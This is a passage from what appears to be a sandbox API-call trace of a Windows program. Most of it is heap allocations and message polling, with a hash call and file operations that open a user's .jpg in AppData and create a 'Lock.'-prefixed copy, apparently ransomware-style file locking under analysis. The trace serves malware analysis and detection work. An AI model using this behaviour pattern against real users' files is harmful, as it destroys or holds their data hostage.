dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0207.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0207.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0207.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0207.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0207.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0207.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0207.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0207.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0207.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0207.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0207.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0207.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0207.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0207.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0207.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0207.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0207.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0207.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0207.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0207.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0207.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0207.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416490 [0207.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0207.195] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0207.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0207.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0207.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0207.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0207.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0207.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0207.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0207.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0207.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0207.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0207.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0207.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0207.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0207.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0207.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0207.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0207.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0207.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0207.196] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0207.196] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0207.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0207.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0207.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0207.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0207.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0207.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0207.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0207.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0207.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0207.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0207.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0207.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0207.197] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0207.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0207.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0207.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0207.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0207.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0207.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0207.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0207.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0207.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0207.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0207.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0207.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0207.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0207.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0207.198] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0207.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0207.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0207.198] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0207.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0207.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0207.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0207.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0207.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0207.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0207.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0207.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0207.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0207.199] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0207.199] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0207.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0207.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0207.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0207.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0207.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0207.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0207.199] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0207.199] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0207.199] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0207.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0207.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0207.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0207.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0207.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0207.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0207.200] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0207.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0207.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0207.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0207.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0207.200] CryptDestroyHash (hHash=0xaa5760) returned 1 [0207.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0207.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0207.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0207.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0207.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0207.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0207.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0207.200] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0207.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0207.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0207.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0207.201] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0207.201] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.201] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.201] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0207.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0207.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0207.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0207.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0207.201] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/yI2BOQ.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\yi2boq.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f8 [0207.202] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0207.202] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0207.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0207.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0207.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0207.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0207.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0207.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0207.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0207.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0207.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0207.202] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0207.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0207.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0207.202] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0207.202] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0207.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0207.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0207.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0207.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0207.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0207.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0207.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0207.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0207.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0207.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0207.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0207.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0207.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0207.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0207.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0207.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0207.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0207.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0207.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x24b30f8 [0207.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0207.204] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming")) returned 0x2010 [0207.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b30f8 | out: hHeap=0x25c0000) returned 1 [0207.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0207.204] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0207.204] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10000) returned 0x24c7a50 [0207.204] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0207.204] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0207.204] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/Lock.yI2BOQ.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\lock.yi2boq.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x268 [0207.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0207.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0207.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0207.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0207.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0207.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0207.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0207.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0207.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0207.205] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0207.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0207.205] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0207.205] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0207.206] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0207.206] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0207.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0207.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0207.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0207.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0207.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0207.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0207.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0207.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0207.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0207.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0207.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0207.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0207.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0207.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0207.206] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0207.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0207.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0207.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0207.207] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 